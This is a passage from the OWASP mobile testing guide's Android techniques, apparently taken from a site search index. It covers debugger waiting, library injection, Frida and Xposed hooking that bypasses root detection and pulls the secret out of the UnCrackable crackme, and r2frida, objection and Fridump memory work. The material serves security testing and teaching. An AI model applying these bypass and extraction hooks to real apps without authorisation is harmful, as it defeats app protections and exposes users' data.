adb install UnCrackable-Repackaged.apk\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0040/","title":"Waiting for the Debugger","text":"The UnCrackable App for Android Level 1 is not stupid: it notices that it has been run in debuggable mode and reacts by shutting down. A modal dialog is shown immediately, and the crackme terminates once you tap \"OK\".
Fortunately, Android's \"Developer options\" contain the useful \"Wait for Debugger\" feature, which allows you to automatically suspend an app during startup until a JDWP debugger connects. With this feature, you can connect the debugger before the detection mechanism runs, and trace, debug, and deactivate that mechanism. It's really an unfair advantage, but, on the other hand, reverse engineers never play fair!
In the Developer options, pick Uncrackable1
as the debugging application and activate the \"Wait for Debugger\" switch.
Note: Even with ro.debuggable
set to \"1\" in default.prop
, an app won't show up in the \"debug app\" list unless the android:debuggable
flag is set to \"true\"
in the Android Manifest.
In the previous section we learned about patching application code to assist in our analysis, but this approach has several limitations. For instance, you'd like to log everything that's being sent over the network without having to perform a MITM attack. For this you'd have to patch all possible calls to the network APIs, which can quickly become impractical when dealing with large applications. In addition, the fact that patching is unique to each application can also be considered a shortcoming, as this code cannot be easily reused.
Using library injection you can develop reusable libraries and inject them to different applications, effectively making them behave differently without having to modify their original source code. This is known as DLL injection on Windows (broadly used to modify and bypass anti-cheat mechanisms in games), LD_PRELOAD
on Linux and DYLD_INSERT_LIBRARIES
on macOS. On Android and iOS, a common example is using the Frida Gadget whenever Frida's so-called Injected mode of operation isn\u2019t suitable (i.e. you cannot run the Frida server on the target device). In this situation, you can inject the Gadget library by using the same methods you're going to learn in this section.
Library injection is desirable in many situations such as:
In this section, we will learn about techniques for performing library injection on Android, which basically consist of patching the application code (smali or native) or alternatively using the LD_PRELOAD
feature provided by the OS loader itself.
An Android application's decompiled smali code can be patched to introduce a call to System.loadLibrary
. The following smali patch injects a library named libinject.so:
const-string v0, \"inject\"\ninvoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V\n
Ideally you should insert the above code early in the application lifecycle, for instance in the onCreate
method. It is important to remember to add the library libinject.so in the respective architecture folder (armeabi-v7a, arm64-v8a, x86) of the lib
folder in the APK. Finally, you need to re-sign the application before using it.
A well-known use case of this technique is loading the Frida gadget to an application, especially while working on a non-rooted device (this is what objection patchapk
basically does).
Many Android applications use native code in addition to Java code for various performance and security reasons. The native code is present in the form of ELF shared libraries. An ELF executable includes a list of shared libraries (dependencies) that are linked to the executable for it to function optimally. This list can be modified to insert an additional library to be injected into the process.
Modifying the ELF file structure manually to inject a library can be cumbersome and prone to errors. However, this task can be performed with relative ease using LIEF (Library to Instrument Executable Formats). Using it requires only a few lines of Python code as shown below:
import lief\n\nlibnative = lief.parse(\"libnative.so\")\nlibnative.add_library(\"libinject.so\") # Injection!\nlibnative.write(\"libnative.so\")\n
In the above example, libinject.so library is injected as a dependency of a native library (libnative.so), which the application already loads by default. Frida gadget can be injected into an application using this approach as explained in detail in LIEF's documentation. As in the previous section, it is important to remember adding the library to the respective architecture lib
folder in the APK and finally re-signing the application.
Above we looked into techniques which require some kind of modification of the application's code. A library can also be injected into a process using functionalities offered by the loader of the operating system. On Android, which is a Linux based OS, you can load an additional library by setting the LD_PRELOAD
environment variable.
As the ld.so man page states, symbols loaded from the library passed using LD_PRELOAD
always get precedence, i.e. they are searched first by the loader while resolving the symbols, effectively overriding the original ones. This feature is often used to inspect the input parameters of some commonly used libc functions such as fopen
, read
, write
, strcmp
, etc., specially in obfuscated programs, where understanding their behavior may be challenging. Therefore, having an insight on which files are being opened or which strings are being compared may be very valuable. The key idea here is \"function wrapping\", meaning that you cannot patch system calls such as libc's fopen
, but you can override (wrap) it including custom code that will, for instance, print the input parameters for you and still call the original fopen
remaining transparent to the caller.
On Android, setting LD_PRELOAD
is slightly different compared to other Linux distributions. If you recall from the \"Platform Overview\" section, every application in Android is forked from Zygote, which is started very early during the Android boot-up. Thus, setting LD_PRELOAD
on Zygote is not possible. As a workaround for this problem, Android supports the setprop
(set property) functionality. Below you can see an example for an application with package name com.foo.bar
(note the additional wrap.
prefix):
setprop wrap.com.foo.bar LD_PRELOAD=/data/local/tmp/libpreload.so\n
Please note that if the library to be preloaded does not have SELinux context assigned, from Android 5.0 (API level 21) onwards, you need to disable SELinux to make LD_PRELOAD
work, which may require root.
You can use the command Java
in the Frida CLI to access the Java runtime and retrieve information from the running app. Remember that, unlike Frida for iOS, in Android you need to wrap your code inside a Java.perform
function. Thus, it's more convenient to use Frida scripts to e.g. get a list of loaded Java classes and their corresponding methods and fields or for more complex information gathering or instrumentation. One such scripts is listed below. The script to list class's methods used below is available on Github.
// Get list of loaded Java classes and methods\n\n// Filename: java_class_listing.js\n\nJava.perform(function() {\n Java.enumerateLoadedClasses({\n onMatch: function(className) {\n console.log(className);\n describeJavaClass(className);\n },\n onComplete: function() {}\n });\n});\n\n// Get the methods and fields\nfunction describeJavaClass(className) {\n var jClass = Java.use(className);\n console.log(JSON.stringify({\n _name: className,\n _methods: Object.getOwnPropertyNames(jClass.__proto__).filter(function(m) {\n return !m.startsWith('$') // filter out Frida related special properties\n || m == 'class' || m == 'constructor' // optional\n }),\n _fields: jClass.class.getFields().map(function(f) {\n return( f.toString());\n })\n }, null, 2));\n}\n
After saving the script to a file called java_class_listing.js, you can tell Frida CLI to load it by using the flag -l
and inject it to the process ID specified by -p
.
frida -U -l java_class_listing.js -p <pid>\n\n// Output\n[Huawei Nexus 6P::sg.vantagepoint.helloworldjni]->\n...\n\ncom.scottyab.rootbeer.sample.MainActivity\n{\n \"_name\": \"com.scottyab.rootbeer.sample.MainActivity\",\n \"_methods\": [\n ...\n \"beerView\",\n \"checkRootImageViewList\",\n \"floatingActionButton\",\n \"infoDialog\",\n \"isRootedText\",\n \"isRootedTextDisclaimer\",\n \"mActivity\",\n \"GITHUB_LINK\"\n ],\n \"_fields\": [\n \"public static final int android.app.Activity.DEFAULT_KEYS_DIALER\",\n...\n
Given the verbosity of the output, the system classes can be filtered out programmatically to make output more readable and relevant to the use case.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0043/","title":"Method Hooking","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0043/#xposed","title":"Xposed","text":"Let's assume you're testing an app that's stubbornly quitting on your rooted device. You decompile the app and find the following highly suspect method:
package com.example.a.b\n\npublic static boolean c() {\n int v3 = 0;\n boolean v0 = false;\n\n String[] v1 = new String[]{\"/sbin/\", \"/system/bin/\", \"/system/xbin/\", \"/data/local/xbin/\",\n \"/data/local/bin/\", \"/system/sd/xbin/\", \"/system/bin/failsafe/\", \"/data/local/\"};\n\n int v2 = v1.length;\n\n for(int v3 = 0; v3 < v2; v3++) {\n if(new File(String.valueOf(v1[v3]) + \"su\").exists()) {\n v0 = true;\n return v0;\n }\n }\n\n return v0;\n}\n
This method iterates through a list of directories and returns true
(device rooted) if it finds the su
binary in any of them. Checks like this are easy to deactivate all you have to do is replace the code with something that returns \"false\". Method hooking with an Xposed module is one way to do this (see \"Android Basic Security Testing\" for more details on Xposed installation and basics).
The method XposedHelpers.findAndHookMethod
allows you to override existing class methods. By inspecting the decompiled source code, you can find out that the method performing the check is c
. This method is located in the class com.example.a.b
. The following is an Xposed module that overrides the function so that it always returns false:
package com.awesome.pentestcompany;\n\nimport static de.robv.android.xposed.XposedHelpers.findAndHookMethod;\nimport de.robv.android.xposed.IXposedHookLoadPackage;\nimport de.robv.android.xposed.XposedBridge;\nimport de.robv.android.xposed.XC_MethodHook;\nimport de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;\n\npublic class DisableRootCheck implements IXposedHookLoadPackage {\n\n public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {\n if (!lpparam.packageName.equals(\"com.example.targetapp\"))\n return;\n\n findAndHookMethod(\"com.example.a.b\", lpparam.classLoader, \"c\", new XC_MethodHook() {\n @Override\n\n protected void beforeHookedMethod(MethodHookParam param) throws Throwable {\n XposedBridge.log(\"Caught root check!\");\n param.setResult(false);\n }\n\n });\n }\n}\n
Just like regular Android apps, modules for Xposed are developed and deployed with Android Studio. For more details on writing, compiling, and installing Xposed modules, refer to the tutorial provided by its author, rovo89.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0043/#frida","title":"Frida","text":"We'll use Frida to solve the UnCrackable App for Android Level 1 and demonstrate how we can easily bypass root detection and extract secret data from the app.
When you start the crackme app on an emulator or a rooted device, you'll find that the it presents a dialog box and exits as soon as you press \"OK\" because it detected root:
Let's see how we can prevent this.
The main method (decompiled with CFR) looks like this:
package sg.vantagepoint.uncrackable1;\n\nimport android.app.Activity;\nimport android.app.AlertDialog;\nimport android.content.Context;\nimport android.content.DialogInterface;\nimport android.os.Bundle;\nimport android.text.Editable;\nimport android.view.View;\nimport android.widget.EditText;\nimport sg.vantagepoint.a.b;\nimport sg.vantagepoint.a.c;\nimport sg.vantagepoint.uncrackable1.a;\n\npublic class MainActivity\nextends Activity {\n private void a(String string) {\n AlertDialog alertDialog = new AlertDialog.Builder((Context)this).create();\n alertDialog.setTitle((CharSequence)string);\n alertDialog.setMessage((CharSequence)\"This is unacceptable. The app is now going to exit.\");\n alertDialog.setButton(-3, (CharSequence)\"OK\", new DialogInterface.OnClickListener(){\n\n public void onClick(DialogInterface dialogInterface, int n) {\n System.exit((int)0);\n }\n });\n alertDialog.setCancelable(false);\n alertDialog.show();\n }\n\n protected void onCreate(Bundle bundle) {\n if (c.a() || c.b() || c.c()) {\n this.a(\"Root detected!\");\n }\n if (b.a(this.getApplicationContext())) {\n this.a(\"App is debuggable!\");\n }\n super.onCreate(bundle);\n this.setContentView(2130903040);\n }\n\n /*\n * Enabled aggressive block sorting\n */\n public void verify(View object) {\n object = ((EditText)this.findViewById(2130837505)).getText().toString();\n AlertDialog alertDialog = new AlertDialog.Builder((Context)this).create();\n if (a.a((String)object)) {\n alertDialog.setTitle((CharSequence)\"Success!\");\n object = \"This is the correct secret.\";\n } else {\n alertDialog.setTitle((CharSequence)\"Nope...\");\n object = \"That's not it. Try again.\";\n }\n alertDialog.setMessage((CharSequence)object);\n alertDialog.setButton(-3, (CharSequence)\"OK\", new DialogInterface.OnClickListener(){\n\n public void onClick(DialogInterface dialogInterface, int n) {\n dialogInterface.dismiss();\n }\n });\n alertDialog.show();\n }\n}\n
Notice the \"Root detected\" message in the onCreate
method and the various methods called in the preceding if
-statement (which perform the actual root checks). Also note the \"This is unacceptable...\" message from the first method of the class, private void a
. Obviously, this method displays the dialog box. There is an alertDialog.onClickListener
callback set in the setButton
method call, which closes the application via System.exit
after successful root detection. With Frida, you can prevent the app from exiting by hooking the MainActivity.a
method or the callback inside it. The example below shows how you can hook MainActivity.a
and prevent it from ending the application.
setImmediate(function() { //prevent timeout\n console.log(\"[*] Starting script\");\n\n Java.perform(function() {\n var mainActivity = Java.use(\"sg.vantagepoint.uncrackable1.MainActivity\");\n mainActivity.a.implementation = function(v) {\n console.log(\"[*] MainActivity.a called\");\n };\n console.log(\"[*] MainActivity.a modified\");\n\n });\n});\n
Wrap your code in the function setImmediate
to prevent timeouts (you may or may not need to do this), then call Java.perform
to use Frida's methods for dealing with Java. Afterwards retrieve a wrapper for MainActivity
class and overwrite its a
method. Unlike the original, the new version of a
just writes console output and doesn't exit the app. An alternative solution is to hook onClick
method of the OnClickListener
interface. You can overwrite the onClick
method and prevent it from ending the application with the System.exit
call. If you want to inject your own Frida script, it should either disable the AlertDialog
entirely or change the behavior of the onClick
method so the app does not exit when you click \"OK\".
Save the above script as uncrackable1.js
and load it:
frida -U -f owasp.mstg.uncrackable1 -l uncrackable1.js --no-pause\n
After you see the \"MainActivity.a modified\" message and the app will not exit anymore.
You can now try to input a \"secret string\". But where do you get it?
If you look at the class sg.vantagepoint.uncrackable1.a
, you can see the encrypted string with which your input gets compared:
package sg.vantagepoint.uncrackable1;\n\nimport android.util.Base64;\nimport android.util.Log;\n\npublic class a {\n public static boolean a(String string) {\n\n byte[] arrby = Base64.decode((String)\"5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\", (int)0);\n\n try {\n arrby = sg.vantagepoint.a.a.a(a.b(\"8d127684cbc37c17616d806cf50473cc\"), arrby);\n }\n catch (Exception exception) {\n StringBuilder stringBuilder = new StringBuilder();\n stringBuilder.append(\"AES error:\");\n stringBuilder.append(exception.getMessage());\n Log.d((String)\"CodeCheck\", (String)stringBuilder.toString());\n arrby = new byte[]{};\n }\n return string.equals((Object)new String(arrby));\n }\n\n public static byte[] b(String string) {\n int n = string.length();\n byte[] arrby = new byte[n / 2];\n for (int i = 0; i < n; i += 2) {\n arrby[i / 2] = (byte)((Character.digit((char)string.charAt(i), (int)16) << 4) + Character.digit((char)string.charAt(i + 1), (int)16));\n }\n return arrby;\n }\n}\n
Look at the string.equals
comparison at the end of the a
method and the creation of the string arrby
in the try
block above. arrby
is the return value of the function sg.vantagepoint.a.a.a
. string.equals
comparison compares your input with arrby
. So we want the return value of sg.vantagepoint.a.a.a.
Instead of reversing the decryption routines to reconstruct the secret key, you can simply ignore all the decryption logic in the app and hook the sg.vantagepoint.a.a.a
function to catch its return value. Here is the complete script that prevents exiting on root and intercepts the decryption of the secret string:
setImmediate(function() { //prevent timeout\n console.log(\"[*] Starting script\");\n\n Java.perform(function() {\n var mainActivity = Java.use(\"sg.vantagepoint.uncrackable1.MainActivity\");\n mainActivity.a.implementation = function(v) {\n console.log(\"[*] MainActivity.a called\");\n };\n console.log(\"[*] MainActivity.a modified\");\n\n var aaClass = Java.use(\"sg.vantagepoint.a.a\");\n aaClass.a.implementation = function(arg1, arg2) {\n var retval = this.a(arg1, arg2);\n var password = '';\n for(var i = 0; i < retval.length; i++) {\n password += String.fromCharCode(retval[i]);\n }\n\n console.log(\"[*] Decrypted: \" + password);\n return retval;\n };\n console.log(\"[*] sg.vantagepoint.a.a.a modified\");\n });\n});\n
After running the script in Frida and seeing the \"[*] sg.vantagepoint.a.a.a modified\" message in the console, enter a random value for \"secret string\" and press verify. You should get an output similar to the following:
$ frida -U -f owasp.mstg.uncrackable1 -l uncrackable1.js --no-pause\n\n[*] Starting script\n[USB::Android Emulator 5554::sg.vantagepoint.uncrackable1]-> [*] MainActivity.a modified\n[*] sg.vantagepoint.a.a.a modified\n[*] MainActivity.a called.\n[*] Decrypted: I want to believe\n
The hooked function outputted the decrypted string. You extracted the secret string without having to dive too deep into the application code and its decryption routines.
You've now covered the basics of static/dynamic analysis on Android. Of course, the only way to really learn it is hands-on experience: build your own projects in Android Studio, observe how your code gets translated into bytecode and native code, and try to crack our challenges.
In the remaining sections, we'll introduce a few advanced subjects, including process exploration, kernel modules and dynamic execution.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/","title":"Process Exploration","text":"When testing an app, process exploration can provide the tester with deep insights into the app process memory. It can be achieved via runtime instrumentation and allows to perform tasks such as:
As you can see, these passive tasks help us collect information. This Information is often used for other techniques, such as method hooking.
In the following sections you will be using r2frida to retrieve information straight from the app runtime. Please refer to r2frida's official installation instructions. First start by opening an r2frida session to the target app (e.g. HelloWorld JNI APK) that should be running on your Android phone (connected per USB). Use the following command:
r2 frida://usb//sg.vantagepoint.helloworldjni\n
See all options with r2 frida://?
.
Once in the r2frida session, all commands start with :
. For example, in radare2 you'd run i
to display the binary information, but in r2frida you'd use :i
.
You can retrieve the app's memory maps by running \\dm
. The output in Android can get very long (e.g. between 1500 and 2000 lines), to narrow your search and see only what directly belongs to the app apply a grep (~
) by package name \\dm~<package_name>
:
[0x00000000]> \\dm~sg.vantagepoint.helloworldjni\n0x000000009b2dc000 - 0x000000009b361000 rw- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x000000009b361000 - 0x000000009b36e000 --- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x000000009b36e000 - 0x000000009b371000 rw- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x0000007d103be000 - 0x0000007d10686000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.vdex\n0x0000007d10dd0000 - 0x0000007d10dee000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10dee000 - 0x0000007d10e2b000 r-x /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10e3a000 - 0x0000007d10e3b000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10e3b000 - 0x0000007d10e3c000 rw- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d1c499000 - 0x0000007d1c49a000 r-x /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4a9000 - 0x0000007d1c4aa000 r-- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4aa000 - 0x0000007d1c4ab000 rw- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c516000 - 0x0000007d1c54d000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007dbd23c000 - 0x0000007dbd247000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007dc05db000 - 0x0000007dc05dc000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art\n
While you're searching or exploring the app memory, you can always verify where you're located at each moment (where your current offset is located) in the memory map. Instead of noting and searching for the memory address in this list you can simply run \\dm.
. You'll find an example in the following section \"In-Memory Search\".
If you're only interested in the modules (binaries and libraries) that the app has loaded, you can use the command \\il
to list them all:
[0x00000000]> \\il\n0x000000558b1fd000 app_process64\n0x0000007dbc859000 libandroid_runtime.so\n0x0000007dbf5d7000 libbinder.so\n0x0000007dbff4d000 libcutils.so\n0x0000007dbfd13000 libhwbinder.so\n0x0000007dbea00000 liblog.so\n0x0000007dbcf17000 libnativeloader.so\n0x0000007dbf21c000 libutils.so\n0x0000007dbde4b000 libc++.so\n0x0000007dbe09b000 libc.so\n...\n0x0000007d10dd0000 base.odex\n0x0000007d1c499000 libnative-lib.so\n0x0000007d2354e000 frida-agent-64.so\n0x0000007dc065d000 linux-vdso.so.1\n0x0000007dc065f000 linker64\n
As you might expect you can correlate the addresses of the libraries with the memory maps: e.g. the native library of the app is located at 0x0000007d1c499000
and optimized dex (base.odex) at 0x0000007d10dd0000
.
You can also use objection to display the same information.
$ objection --gadget sg.vantagepoint.helloworldjni explore\n\nsg.vantagepoint.helloworldjni on (google: 8.1.0) [usb] # memory list modules\nSave the output by adding `--json modules.json` to this command\n\nName Base Size Path\n----------------------------------------------- ------------ -------------------- --------------------------------------------------------------------\napp_process64 0x558b1fd000 32768 (32.0 KiB) /system/bin/app_process64\nlibandroid_runtime.so 0x7dbc859000 1982464 (1.9 MiB) /system/lib64/libandroid_runtime.so\nlibbinder.so 0x7dbf5d7000 557056 (544.0 KiB) /system/lib64/libbinder.so\nlibcutils.so 0x7dbff4d000 77824 (76.0 KiB) /system/lib64/libcutils.so\nlibhwbinder.so 0x7dbfd13000 163840 (160.0 KiB) /system/lib64/libhwbinder.so\nbase.odex 0x7d10dd0000 442368 (432.0 KiB) /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\nlibnative-lib.so 0x7d1c499000 73728 (72.0 KiB) /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n
You can even directly see the size and the path to that binary in the Android file system.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/#in-memory-search","title":"In-Memory Search","text":"In-memory search is a very useful technique to test for sensitive data that might be present in the app memory.
See r2frida's help on the search command (\\/?
) to learn about the search command and get a list of options. The following shows only a subset of them:
[0x00000000]> \\/?\n / search\n /j search json\n /w search wide\n /wj search wide json\n /x search hex\n /xj search hex json\n...\n
You can adjust your search by using the search settings \\e~search
. For example, \\e search.quiet=true;
will print only the results and hide search progress:
[0x00000000]> \\e~search\ne search.in=perm:r--\ne search.quiet=false\n
For now, we'll continue with the defaults and concentrate on string search. This app is actually very simple, it loads the string \"Hello from C++\" from its native library and displays it to us. You can start by searching for \"Hello\" and see what r2frida finds:
[0x00000000]> \\/ Hello\nSearching 5 bytes: 48 65 6c 6c 6f\n...\nhits: 11\n0x13125398 hit0_0 HelloWorldJNI\n0x13126b90 hit0_1 Hello World!\n0x1312e220 hit0_2 Hello from C++\n0x70654ec5 hit0_3 Hello\n0x7d1c499560 hit0_4 Hello from C++\n0x7d1c4a9560 hit0_5 Hello from C++\n0x7d1c51cef9 hit0_6 HelloWorldJNI\n0x7d30ba11bc hit0_7 Hello World!\n0x7d39cd796b hit0_8 Hello.java\n0x7d39d2024d hit0_9 Hello;\n0x7d3aa4d274 hit0_10 Hello\n
Now you'd like to know where these addresses actually are. You may do so by running the \\dm.
command for all @@
hits matching the glob hit0_*
:
[0x00000000]> \\dm.@@ hit0_*\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x00000000703c2000 - 0x00000000709b5000 rw- /data/dalvik-cache/arm64/system@framework@boot-framework.art\n0x0000007d1c499000 - 0x0000007d1c49a000 r-x /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4a9000 - 0x0000007d1c4aa000 r-- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c516000 - 0x0000007d1c54d000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d396bc000 - 0x0000007d3a998000 r-- /system/framework/arm64/boot-framework.vdex\n0x0000007d396bc000 - 0x0000007d3a998000 r-- /system/framework/arm64/boot-framework.vdex\n0x0000007d3a998000 - 0x0000007d3aa9c000 r-- /system/framework/arm64/boot-ext.vdex\n
Additionally, you can search for occurrences of the wide version of the string (\\/w
) and, again, check their memory regions:
[0x00000000]> \\/w Hello\nSearching 10 bytes: 48 00 65 00 6c 00 6c 00 6f 00\nhits: 6\n0x13102acc hit1_0 480065006c006c006f00\n0x13102b9c hit1_1 480065006c006c006f00\n0x7d30a53aa0 hit1_2 480065006c006c006f00\n0x7d30a872b0 hit1_3 480065006c006c006f00\n0x7d30bb9568 hit1_4 480065006c006c006f00\n0x7d30bb9a68 hit1_5 480065006c006c006f00\n\n[0x00000000]> \\dm.@@ hit1_*\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n
They are in the same rw- region as one of the previous strings (0x0000007d30a00000
). Note that searching for the wide versions of strings is sometimes the only way to find them as you'll see in the following section.
In-memory search can be very useful to quickly know if certain data is located in the main app binary, inside a shared library or in another region. You may also use it to test the behavior of the app regarding how the data is kept in memory. For instance, you could analyze an app that performs a login and search for occurrences of the user password. Also, you may check if you still can find the password in memory after the login is completed to verify if this sensitive data is wiped from memory after its use.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/#memory-dump","title":"Memory Dump","text":"You can dump the app's process memory with objection and Fridump. To take advantage of these tools on a non-rooted device, the Android app must be repackaged with frida-gadget.so
and re-signed. A detailed explanation of this process is in the section Dynamic Analysis on Non-Rooted Devices. To use these tools on a rooted phone, simply have frida-server installed and running.
Note: When using these tools, you might get several memory access violation errors which can normally be ignored. These tools inject a Frida agent and try to dump all the mapped memory of the app regardless of the access permissions (read/write/execute). Therefore, when the injected Frida agent tries to read a region that's not readable, it'll return the corresponding memory access violation errors. Refer to previous section \"Memory Maps and Inspection\" for more details.
With objection it is possible to dump all memory of the running process on the device by using the command memory dump all
.
$ objection --gadget sg.vantagepoint.helloworldjni explore\n\nsg.vantagepoint.helloworldjni on (google: 8.1.0) [usb] # memory dump all /Users/foo/memory_Android/memory\n\nWill dump 719 rw- images, totalling 1.6 GiB\nDumping 1002.8 MiB from base: 0x14140000 [------------------------------------] 0% 00:11:03(session detach message) process-terminated\nDumping 8.0 MiB from base: 0x7fc753e000 [####################################] 100%\nMemory dumped to file: /Users/foo/memory_Android/memory\n
In this case there was an error, which is probably due to memory access violations as we already anticipated. This error can be safely ignored as long as we are able to see the extracted dump in the file system. If you have any problems, a first step would be to enable the debug flag -d
when running objection or, if that doesn't help, file an issue in objection's GitHub.
Next, we are able to find the \"Hello from C++\" strings with radare2:
$ r2 /Users/foo/memory_Android/memory\n[0x00000000]> izz~Hello from\n1136 0x00065270 0x00065270 14 15 () ascii Hello from C++\n
Alternatively you can use Fridump. This time, we will input a string and see if we can find it in the memory dump. For this, open the MASTG Hacking Playground app, navigate to \"OMTG_DATAST_002_LOGGING\" and enter \"owasp-mstg\" to the password field. Next, run Fridump:
python3 fridump.py -U sg.vp.owasp_mobile.omtg_android -s\n\nCurrent Directory: /Users/foo/git/fridump\nOutput directory is set to: /Users/foo/git/fridump/dump\nStarting Memory dump...\nOops, memory access violation!-------------------------------] 0.28% Complete\nProgress: [##################################################] 99.58% Complete\nRunning strings on all files:\nProgress: [##################################################] 100.0% Complete\n\nFinished!\n
Tip: Enable verbosity by including the flag -v
if you want to see more details, e.g. the regions provoking memory access violations.
It will take a while until it's completed and you'll get a collection of *.data files inside the dump folder. When you add the -s
flag, all strings are extracted from the dumped raw memory files and added to the file strings.txt
, which is also stored in the dump directory.
ls dump/\ndump/1007943680_dump.data dump/357826560_dump.data dump/630456320_dump.data ... strings.txt\n
Finally, search for the input string in the dump directory:
$ grep -nri owasp-mstg dump/\nBinary file dump//316669952_dump.data matches\nBinary file dump//strings.txt matches\n
The \"owasp-mstg\" string can be found in one of the dump files as well as in the processed strings file.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0045/","title":"Runtime Reverse Engineering","text":"Runtime reverse engineering can be seen as the on-the-fly version of reverse engineering where you don't have the binary data to your host computer. Instead, you'll analyze it straight from the memory of the app.
We'll keep using the HelloWorld JNI app, open a session with r2frida r2 frida://usb//sg.vantagepoint.helloworldjni
and you can start by displaying the target binary information by using the :i
command:
[0x00000000]> :i\narch arm\nbits 64\nos linux\npid 13215\nuid 10096\nobjc false\nruntime V8\njava true\ncylang false\npageSize 4096\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\ncwd /\ndataDir /data/user/0/sg.vantagepoint.helloworldjni\ncodeCacheDir /data/user/0/sg.vantagepoint.helloworldjni/code_cache\nextCacheDir /storage/emulated/0/Android/data/sg.vantagepoint.helloworldjni/cache\nobbDir /storage/emulated/0/Android/obb/sg.vantagepoint.helloworldjni\nfilesDir /data/user/0/sg.vantagepoint.helloworldjni/files\nnoBackupDir /data/user/0/sg.vantagepoint.helloworldjni/no_backup\ncodePath /data/app/sg.vantagepoint.helloworldjni-1/base.apk\npackageName sg.vantagepoint.helloworldjni\nandroidId c92f43af46f5578d\ncacheDir /data/local/tmp\njniEnv 0x7d30a43c60\n
Search all symbols of a certain module with :is <lib>
, e.g. :is libnative-lib.so
.
[0x00000000]> \\is libnative-lib.so\n\n[0x00000000]>\n
Which are empty in this case. Alternatively, you might prefer to look into the imports/exports. For example, list the imports with :ii <lib>
:
[0x00000000]> :ii libnative-lib.so\n0x7dbe1159d0 f __cxa_finalize /system/lib64/libc.so\n0x7dbe115868 f __cxa_atexit /system/lib64/libc.so\n
And list the exports with :iE <lib>
:
[0x00000000]> :iE libnative-lib.so\n0x7d1c49954c f Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
For big binaries it's recommended to pipe the output to the internal less program by appending ~..
, i.e. \\ii libandroid_runtime.so~..
(if not, for this binary, you'd get almost 2500 lines printed to your terminal).
The next thing you might want to look at are the currently loaded Java classes:
[0x00000000]> \\ic~sg.vantagepoint.helloworldjni\nsg.vantagepoint.helloworldjni.MainActivity\n
List class fields:
[0x00000000]> :ic sg.vantagepoint.helloworldjni.MainActivity~sg.vantagepoint.helloworldjni\npublic native java.lang.String sg.vantagepoint.helloworldjni.MainActivity.stringFromJNI()\npublic sg.vantagepoint.helloworldjni.MainActivity()\n
Note that we've filtered by package name as this is the MainActivity
and it includes all methods from Android's Activity
class.
You can also display information about the class loader:
[0x00000000]> :icL\ndalvik.system.PathClassLoader[\n DexPathList[\n [\n directory \".\"]\n ,\n nativeLibraryDirectories=[\n /system/lib64,\n /vendor/lib64,\n /system/lib64,\n /vendor/lib64]\n ]\n ]\njava.lang.BootClassLoader@b1f1189dalvik.system.PathClassLoader[\n DexPathList[\n [\n zip file \"/data/app/sg.vantagepoint.helloworldjni-1/base.apk\"]\n ,\n nativeLibraryDirectories=[\n /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64,\n /data/app/sg.vantagepoint.helloworldjni-1/base.apk!/lib/arm64-v8a,\n /system/lib64,\n /vendor/lib64]\n ]\n ]\n
Next, imagine that you are interested into the method exported by libnative-lib.so 0x7d1c49954c f Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
. You can seek to that address with s 0x7d1c49954c
, analyze that function af
and print 10 lines of its disassembly pd 10
:
